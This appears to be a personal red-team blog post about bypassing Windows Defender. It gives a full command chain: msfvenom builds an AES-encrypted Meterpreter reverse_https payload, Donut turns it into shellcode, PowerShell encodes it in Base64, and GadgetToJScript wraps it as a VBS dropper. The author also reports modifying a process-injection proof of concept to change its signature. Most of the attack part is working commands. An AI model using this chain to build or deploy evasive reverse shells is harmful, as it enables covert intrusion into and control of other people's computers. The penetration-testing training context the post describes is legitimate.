When I was enrolled in PWK to obtain my OSCP, we (the students) luckily did not have to bother with up-to-date installed Antivirus software on the machines within the lab. Even though we learned some techniques to bypass UAC, bypassing AV software such as Windows Defender (installed by default on Windows 10) was kept a secret.
However, speaking from a Red Teaming perspective, it’s crucial to know how to bypass installed AV software, because (as I’ve already written) Windows Defender is installed by default.
Evasion techniques (bypassing AV) is an ongoing game of cat-and-mouse. As new techniques are introduced, they often get patched within a short amount of time.
I’m currently working my way through the Advanced Penetration Testing course from INE/eLearnSecurity (eCPTX). They introduced some techniques for AV evasion. I spent some time to obfuscate a Meterpreter reverse shell and was able to bypass an up-to-date Windows 10 Defender (at this point of writing).
This isn’t going to be an in-depth step-by-step guide. However I’ll mention which tools I used.
I’d like to mention something prior: I first intended to obfuscate a Covenant Grunt. It was working and I got back a connection from the compromised machine. However the Grunt was dying a few seconds later. I tried to debug it, but unfortunately it was unsuccessful (might be a Covenant bug).
I started by generating a Reverse HTTPS Meterpreter Shell (x64 architecture) including symmetric AES encryption.
1
msfvenom -p windows/x64/meterpreter/reverse_https lhost=eth0 lport=8443 exitfunc=thread -a x64 --encrypt aes256 --encrypt-key XmgTNffxyx5Rx6N6 -f exe -o httpsaes.exe
Right after that I used Donut to generate shellcode from the previously generated binary.
1
donut.exe -a 2 httpsaes.exe
Before I was able to move on I had to convert the Donut-generated shellcode into Base64 using PowerShell:
1
2
$shellcode = "C:\Users\Operator\Desktop\shellcode.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($shellcode)) > base64.txt
Next up I was using GadgetToJScript to generate a VBS file, which will get executed on the target machine.
Download the repository and open it with Visual Studio. Once opened open/create TestClass.cs within the TestPayload directory.
I used a Process Injection PoC found on GitHub - but any other Process Injection / shellcode execution technique should work fine, too. I didn’t just paste it in TestClass.cs - no. I removed all comments, added some myself and renamed some variables to modify the signature of the code.
I compiled GadgetToJScript through Visual Studio. After that step I was able to generate the VBS (excluding the extension).
1
.\GadgetToJScript.exe -i .\..\..\..\..\TestPayload\TestClass.cs -r System.Core.dll -w vbs -o C:\Users\Operator\Desktop\evaded
Proof-of-Concept demonstration